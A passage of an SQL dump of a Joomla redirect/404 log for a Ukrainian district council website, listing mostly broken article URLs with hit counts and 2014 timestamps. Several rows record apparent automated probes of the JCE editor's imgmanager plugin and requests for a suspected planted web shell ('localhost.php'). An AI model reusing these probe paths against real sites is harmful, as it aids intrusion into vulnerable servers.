00:00:00',301),(6049,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&Itemid=14&lang=uk','','','',1,0,'2014-09-30 17:21:51','0000-00-00 00:00:00',301),(6050,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&lang=en','','','',1,0,'2014-09-30 17:21:53','0000-00-00 00:00:00',301),(6051,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:21:56','0000-00-00 00:00:00',301),(6052,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&Itemid=70&lang=en','','','',1,0,'2014-09-30 17:21:58','0000-00-00 00:00:00',301),(6053,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&Itemid=97&lang=en','','','',2,0,'2014-09-30 17:21:59','0000-00-00 00:00:00',301),(6054,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&Itemid=97&lang=en','','','',1,0,'2014-09-30 17:22:06','0000-00-00 00:00:00',301),(6055,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:22:07','0000-00-00 00:00:00',301),(6056,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&Itemid=97&lang=en','','','',1,0,'2014-09-30 17:22:16','0000-00-00 00:00:00',301),(6057,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&Itemid=97&lang=en','','','',1,0,'2014-09-30 17:22:18','0000-00-00 00:00:00',301),(6058,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56&Itemid=97&lang=ru','','','',10,0,'2014-09-30 17:22:20','0000-00-00 00:00:00',301),(6059,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=ru','','','',2,0,'2014-09-30 17:22:27','0000-00-00 00:00:00',301),(6060,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&Itemid=88&lang=ru','','','',1,0,'2014-09-30 17:22:46','0000-00-00 00:00:00',301),(6061,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&Itemid=88&lang=uk','','','',1,0,'2014-09-30 17:22:52','0000-00-00 00:00:00',301),(6062,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&Itemid=88&lang=ru','','','',1,0,'2014-09-30 17:22:59','0000-00-00 00:00:00',301),(6063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&Itemid=88&lang=uk','','','',1,0,'2014-09-30 17:23:01','0000-00-00 00:00:00',301),(6064,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&Itemid=14&lang=en','','','',1,0,'2014-09-30 17:23:02','0000-00-00 00:00:00',301),(6065,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:23:28','0000-00-00 00:00:00',301),(6066,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&Itemid=88&lang=uk','','','',2,0,'2014-09-30 17:23:44','0000-00-00 00:00:00',301),(6067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=988:-2013-&Itemid=88&lang=uk','','','',1,0,'2014-09-30 17:23:47','0000-00-00 00:00:00',301),(6068,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=uk','','','',4,0,'2014-09-30 17:23:54','0000-00-00 00:00:00',301),(6069,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=ru','','','',2,0,'2014-09-30 17:24:16','0000-00-00 00:00:00',301),(6070,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&Itemid=14&lang=uk','','','',2,0,'2014-09-30 17:25:30','0000-00-00 00:00:00',301),(6071,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&Itemid=88&lang=en','','','',1,0,'2014-09-30 17:25:37','0000-00-00 00:00:00',301),(6072,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&lang=en','','','',1,0,'2014-09-30 17:25:39','0000-00-00 00:00:00',301),(6073,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&lang=ru','','','',1,0,'2014-09-30 17:25:41','0000-00-00 00:00:00',301),(6074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&Itemid=70&lang=ru','','','',1,0,'2014-09-30 17:25:42','0000-00-00 00:00:00',301),(6075,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&Itemid=94&lang=en','','','',1,0,'2014-09-30 17:25:43','0000-00-00 00:00:00',301),(6076,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:25:45','0000-00-00 00:00:00',301),(6077,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&Itemid=14&lang=uk','','','',1,0,'2014-09-30 17:26:02','0000-00-00 00:00:00',301),(6078,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&lang=uk','','','',1,0,'2014-09-30 17:26:06','0000-00-00 00:00:00',301),(6079,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&Itemid=87&lang=ru','','','',1,0,'2014-09-30 17:26:09','0000-00-00 00:00:00',301),(6080,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:26:11','0000-00-00 00:00:00',301),(6081,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&Itemid=87&lang=uk','','','',1,0,'2014-09-30 17:26:13','0000-00-00 00:00:00',301),(6082,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=uk','','','',7,0,'2014-09-30 17:26:17','0000-00-00 00:00:00',301),(6083,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:26:26','0000-00-00 00:00:00',301),(6084,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&Itemid=14&lang=ru','','','',1,0,'2014-09-30 17:26:27','0000-00-00 00:00:00',301),(6085,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&lang=en','','','',1,0,'2014-09-30 17:26:31','0000-00-00 00:00:00',301),(6086,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&lang=uk','','','',1,0,'2014-09-30 17:26:38','0000-00-00 00:00:00',301),(6087,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&Itemid=97&lang=en','','','',1,0,'2014-09-30 17:26:51','0000-00-00 00:00:00',301),(6088,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&lang=ru','','','',1,0,'2014-09-30 17:27:10','0000-00-00 00:00:00',301),(6089,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&Itemid=95&lang=en','','','',1,0,'2014-09-30 17:27:12','0000-00-00 00:00:00',301),(6090,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&lang=uk','','','',1,0,'2014-09-30 17:27:13','0000-00-00 00:00:00',301),(6091,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&lang=en','','','',1,0,'2014-09-30 17:27:19','0000-00-00 00:00:00',301),(6092,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-30 17:27:20','0000-00-00 00:00:00',301),(6093,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-30 17:27:21','0000-00-00 00:00:00',301),(6094,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&Itemid=70&lang=en','','','',1,0,'2014-09-30 17:27:25','0000-00-00 00:00:00',301),(6095,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&lang=uk','','','',1,0,'2014-09-30 17:27:30','0000-00-00 00:00:00',301),(6096,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&Itemid=14&lang=uk','','','',1,0,'2014-09-30 17:27:31','0000-00-00 00:00:00',301),(6097,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:27:34','0000-00-00 00:00:00',301),(6098,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56&Itemid=97&lang=ru','','','',7,0,'2014-09-30 17:27:37','0000-00-00 00:00:00',301),(6099,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:------------2014--&Itemid=70&lang=en','','','',1,0,'2014-09-30 17:27:42','0000-00-00 00:00:00',301),(6100,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-----------------2007-2015-&Itemid=70&lang=en','','','',1,0,'2014-09-30 17:27:43','0000-00-00 00:00:00',301),(6101,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:27:48','0000-00-00 00:00:00',301),(6102,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&catid=21&Itemid=47&lang=uk','','','',4,0,'2014-09-30 17:27:52','0000-00-00 00:00:00',301),(6103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&Itemid=88&lang=en','','','',1,0,'2014-09-30 17:27:56','0000-00-00 00:00:00',301),(6104,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&lang=ru','','','',1,0,'2014-09-30 17:28:12','0000-00-00 00:00:00',301),(6105,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&lang=uk','','','',1,0,'2014-09-30 17:28:13','0000-00-00 00:00:00',301),(6106,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&Itemid=88&lang=en','','','',1,0,'2014-09-30 17:28:25','0000-00-00 00:00:00',301),(6107,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&Itemid=17&lang=uk','','','',1,0,'2014-09-30 17:28:42','0000-00-00 00:00:00',301),(6108,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1040:2013-07-01-14-27-50&lang=ru&option=com_content&view=article','','','',1,0,'2014-09-30 17:48:37','0000-00-00 00:00:00',301),(6109,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=931:2013-02-21-09-14-48&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-30 17:48:44','0000-00-00 00:00:00',301),(6110,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-30 17:55:08','0000-00-00 00:00:00',301),(6111,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=976:2013-03-21-18-42-06&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-30 18:39:57','0000-00-00 00:00:00',301),(6112,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1162:2013-12-19-06-13-29&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-30 18:39:59','0000-00-00 00:00:00',301),(6113,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1232:2014-03-02-14-32-43&lang=ru&option=com_content&view=article','','','',2,0,'2014-09-30 18:40:08','0000-00-00 00:00:00',301),(6114,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-30 19:10:19','0000-00-00 00:00:00',301),(6115,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=914:2013-01-23-13-21-28&lang=ru&option=com_content&view=article','','','',1,0,'2014-09-30 19:23:16','0000-00-00 00:00:00',301),(6116,'http://www.malyn-rayrada.org.ua/attachments/082_','','','',1,0,'2014-09-30 19:38:22','0000-00-00 00:00:00',301),(6117,'http://www.malyn-rayrada.org.ua/attachments/289_','','','',1,0,'2014-09-30 19:56:00','0000-00-00 00:00:00',301),(6118,'http://www.malyn-rayrada.org.ua/www.youtube.com/v/C-Zw7i31BLc?hl=ru_RU&version=3&rel=0','','','',3,0,'2014-09-30 20:06:10','0000-00-00 00:00:00',301),(6119,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1085:2013-09-11-12-15-54&lang=ru&option=com_content&view=article','','','',1,0,'2014-09-30 20:13:54','0000-00-00 00:00:00',301),(6120,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1005:-7-1943-&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-30 20:14:10','0000-00-00 00:00:00',301),(6121,'http://www.malyn-rayrada.org.ua/index.php/-21022013-','','','',1,0,'2014-09-30 20:15:23','0000-00-00 00:00:00',301),(6122,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&catid=21&Itemid=47&lang=ru','','','',8,0,'2014-09-30 20:39:48','0000-00-00 00:00:00',301),(6123,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-09-30 20:40:20','0000-00-00 00:00:00',301),(6124,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1300:2014-04-25-07-21-54&catid=11&Itemid=14&lang=uk','','','',4,0,'2014-09-30 20:45:01','0000-00-00 00:00:00',301),(6125,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-30 20:50:43','0000-00-00 00:00:00',301),(6126,'http://www.malyn-rayrada.org.ua/index.php/--28032012-','','','',1,0,'2014-09-30 20:50:48','0000-00-00 00:00:00',301),(6127,'http://www.malyn-rayrada.org.ua/index.php/--27042012-','','','',1,0,'2014-09-30 20:53:47','0000-00-00 00:00:00',301),(6128,'http://www.malyn-rayrada.org.ua/index.php/--12042013-','','','',1,0,'2014-09-30 20:56:03','0000-00-00 00:00:00',301),(6129,'http://www.malyn-rayrada.org.ua/index.php/--26122013-','','','',1,0,'2014-09-30 20:56:21','0000-00-00 00:00:00',301),(6130,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-53-35','','','',1,0,'2014-09-30 20:58:38','0000-00-00 00:00:00',301),(6131,'http://www.malyn-rayrada.org.ua/index.php/--16082013-','','','',1,0,'2014-09-30 20:59:04','0000-00-00 00:00:00',301),(6132,'http://www.malyn-rayrada.org.ua/index.php/--30042014-','','','',1,0,'2014-09-30 21:03:20','0000-00-00 00:00:00',301),(6133,'http://www.malyn-rayrada.org.ua/index.php/--15062011-','','','',1,0,'2014-09-30 21:10:53','0000-00-00 00:00:00',301),(6134,'http://www.malyn-rayrada.org.ua/index.php/2010-06-06-10-55-25','','','',1,0,'2014-09-30 21:12:18','0000-00-00 00:00:00',301),(6135,'http://www.malyn-rayrada.org.ua/index.php/--21122012','','','',1,0,'2014-09-30 21:12:29','0000-00-00 00:00:00',301),(6136,'http://www.malyn-rayrada.org.ua/index.php/2010-06-07-09-15-05','','','',1,0,'2014-09-30 21:18:36','0000-00-00 00:00:00',301),(6137,'http://www.malyn-rayrada.org.ua/index.php/--16052012-','','','',1,0,'2014-09-30 21:47:28','0000-00-00 00:00:00',301),(6138,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1025:-2011-2015-&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-30 21:48:08','0000-00-00 00:00:00',301),(6139,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1270:2014-04-08-13-49-40&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-30 21:48:10','0000-00-00 00:00:00',301),(6140,'http://www.malyn-rayrada.org.ua/index.php/2010-06-07-07-54-47','','','',1,0,'2014-09-30 21:53:51','0000-00-00 00:00:00',301),(6141,'http://www.malyn-rayrada.org.ua/index.php/--03022014-','','','',1,0,'2014-09-30 22:09:48','0000-00-00 00:00:00',301),(6142,'http://www.malyn-rayrada.org.ua/index.php/--12092012-','','','',1,0,'2014-09-30 22:10:04','0000-00-00 00:00:00',301),(6143,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56&Itemid=97&lang=en','','','',2,0,'2014-09-30 22:55:00','0000-00-00 00:00:00',301),(6144,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-30 23:01:13','0000-00-00 00:00:00',301),(6145,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-30 23:04:38','0000-00-00 00:00:00',301),(6146,'http://www.malyn-rayrada.org.ua/index.php/-22022012-','','','',1,0,'2014-09-30 23:10:18','0000-00-00 00:00:00',301),(6147,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=936:2013-02-21-09-43-43&lang=uk&option=com_content&view=article','','','',4,0,'2014-09-30 23:22:05','0000-00-00 00:00:00',301),(6148,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1059:2013-07-24-05-42-15&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-30 23:22:06','0000-00-00 00:00:00',301),(6149,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-30 23:45:06','0000-00-00 00:00:00',301),(6150,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-10-01 00:00:26','0000-00-00 00:00:00',301),(6151,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-01 00:07:56','0000-00-00 00:00:00',301),(6152,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54:--29112013-&Itemid=95&lang=uk','','','',6,0,'2014-10-01 00:15:05','0000-00-00 00:00:00',301),(6153,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&Itemid=14&lang=uk','','','',11,0,'2014-10-01 00:15:50','0000-00-00 00:00:00',301),(6154,'http://www.malyn-rayrada.org.ua/index.php/--19072013-','','','',1,0,'2014-10-01 00:48:13','0000-00-00 00:00:00',301),(6155,'http://www.malyn-rayrada.org.ua/index.php/840-22-roki-volodimir-stojav-na-choli-ukrainskoi','','','',1,0,'2014-10-01 00:56:15','0000-00-00 00:00:00',301),(6156,'http://www.malyn-rayrada.org.ua/index.php/--14112012-','','','',1,0,'2014-10-01 00:58:31','0000-00-00 00:00:00',301),(6157,'http://www.malyn-rayrada.org.ua/index.php/--11072014-','','','',1,0,'2014-10-01 01:00:31','0000-00-00 00:00:00',301),(6158,'http://www.malyn-rayrada.org.ua/index.php/-22102010-','','','',1,0,'2014-10-01 01:02:31','0000-00-00 00:00:00',301),(6159,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-10-01 01:19:12','0000-00-00 00:00:00',301),(6160,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1125:2013-10-31-07-20-16&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-01 01:31:44','0000-00-00 00:00:00',301),(6161,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:------l---28r&catid=36&Itemid=70&lang=en','','','',1,0,'2014-10-01 01:44:21','0000-00-00 00:00:00',301),(6162,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1232:2014-03-02-14-32-43&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-10-01 02:18:44','0000-00-00 00:00:00',301),(6163,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1346:2014-06-18-11-51-53&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-10-01 02:19:04','0000-00-00 00:00:00',301),(6164,'http://www.malyn-rayrada.org.ua/index.php/--15042014-','','','',1,0,'2014-10-01 02:25:07','0000-00-00 00:00:00',301),(6165,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1223:--28-----6-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-01 02:29:36','0000-00-00 00:00:00',301),(6166,'http://www.malyn-rayrada.org.ua/attachments/article/26/history','','','',27,0,'2014-10-01 02:29:40','0000-00-00 00:00:00',301),(6167,'http://www.malyn-rayrada.org.ua/index.php/-20052011','','','',1,0,'2014-10-01 04:01:58','0000-00-00 00:00:00',301),(6168,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1044:2013-07-05-11-26-05&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-01 04:03:20','0000-00-00 00:00:00',301),(6169,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=882:2012-12-21-17-08-23&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-01 04:03:27','0000-00-00 00:00:00',301),(6170,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&Itemid=14&lang=ru','','','',16,0,'2014-10-01 04:04:30','0000-00-00 00:00:00',301),(6171,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-10-01 04:05:46','0000-00-00 00:00:00',301),(6172,'http://www.malyn-rayrada.org.ua/index.php/--20062014-','','','',1,0,'2014-10-01 05:49:00','0000-00-00 00:00:00',301),(6173,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=897:2013-01-18-07-40-55&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-01 07:11:05','0000-00-00 00:00:00',301),(6174,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36&Itemid=70&lang=en','','','',2,0,'2014-10-01 07:15:06','0000-00-00 00:00:00',301),(6175,'http://malyn-rayrada.org.ua/docs/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-01 08:06:39','0000-00-00 00:00:00',301),(6176,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=ru&sa=U&ei=ZLYrVJ6zOYrYauX8gnA&ved=0CHgQFjAVOGQ&usg=AFQjCNHUuHJXxEdqBxN5wwh-kZvsBfwwMw/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanage','','','',1,0,'2014-10-01 08:13:06','0000-00-00 00:00:00',301),(6177,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=ru&sa=U&ei=ZLYrVJ6zOYrYauX8gnA&ved=0CHgQFjAVOGQ&usg=AFQjCNHUuHJXxEdqBxN5wwh-kZvsBfwwMw//images/stories/localhost.php?rf','','','',1,0,'2014-10-01 08:13:08','0000-00-00 00:00:00',301),(6178,'http://www.malyn-rayrada.org.ua/images/stories/localhost.php?rf','','','',2,0,'2014-10-01 08:13:08','0000-00-00 00:00:00',301),(6179,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=1&lang=en&sa=U&ei=ZLYrVJ6zOYrYauX8gnA&ved=0CH0QFjAWOGQ&usg=AFQjCNFZYQbnH8jUgQXgXgKmIUJb_TL0gQ/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanage','','','',1,0,'2014-10-01 08:13:14','0000-00-00 00:00:00',301),(6180,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=1&lang=en&sa=U&ei=ZLYrVJ6zOYrYauX8gnA&ved=0CH0QFjAWOGQ&usg=AFQjCNFZYQbnH8jUgQXgXgKmIUJb_TL0gQ//images/stories/localhost.php?rf','','','',1,0,'2014-10-01 08:13:16','0000-00-00 00:00:00',301),(6181,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-54-02','','','',1,0,'2014-10-01 08:17:20','0000-00-00 00:00:00',301),(6182,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=1&lang=en&sa=U&ei=bbYrVMuXG5HtaOCtgOAJ&ved=0CH0QFjAWOGQ&usg=AFQjCNHgXwT0p99Ftyluh_dDZaugIDj3_g/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanag','','','',1,0,'2014-10-01 08:17:42','0000-00-00 00:00:00',301),(6183,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=ru&sa=U&ei=bbYrVMuXG5HtaOCtgOAJ&ved=0CHgQFjAVOGQ&usg=AFQjCNGMKR9BWM5K-ewdGHW9PcNFX9x9NA/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanag','','','',1,0,'2014-10-01 08:17:42','0000-00-00 00:00:00',301),(6184,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=1&lang=en&sa=U&ei=bbYrVMuXG5HtaOCtgOAJ&ved=0CH0QFjAWOGQ&usg=AFQjCNHgXwT0p99Ftyluh_dDZaugIDj3_g//images/stories/localhost.php?rf','','','',1,0,'2014-10-01 08:17:43','0000-00-00 00:00:00',301),(6185,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=ru&sa=U&ei=bbYrVMuXG5HtaOCtgOAJ&ved=0CHgQFjAVOGQ&usg=AFQjCNGMKR9BWM5K-ewdGHW9PcNFX9x9NA//images/stories/localhost.php?rf','','','',1,0,'2014-10-01 08:17:44','0000-00-00 00:00:00',301),(6186,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=ru&sa=U&ei=ibYrVP-bBYfPaJ7zgrAL&ved=0CHgQFjAVOGQ&usg=AFQjCNGISUfHgR2sp92-H70vIshRv-5E9A/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanag','','','',1,0,'2014-10-01 08:19:00','0000-00-00 00:00:00',301),(6187,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=1&lang=en&sa=U&ei=ibYrVP-bBYfPaJ7zgrAL&ved=0CH0QFjAWOGQ&usg=AFQjCNEIL6IOIe9DpO7IImvN1b1BSDPm8g/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanag','','','',1,0,'2014-10-01 08:19:00','0000-00-00 00:00:00',301),(6188,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=ru&sa=U&ei=ibYrVP-bBYfPaJ7zgrAL&ved=0CHgQFjAVOGQ&usg=AFQjCNGISUfHgR2sp92-H70vIshRv-5E9A//images/stories/localhost.php?rf','','','',1,0,'2014-10-01 08:19:02','0000-00-00 00:00:00',301),(6189,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10&id=996:2013-04-25-12-09-57&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-01 08:45:27','0000-00-00 00:00:00',301),(6190,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53&Itemid=94&lang=uk','','','',2,0,'2014-10-01 09:00:22','0000-00-00 00:00:00',301),(6191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=10&lang=en','','','',10,0,'2014-10-01 09:03:37','0000-00-00 00:00:00',301),(6192,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=uk','','','',2,0,'2014-10-01 09:10:14','0000-00-00 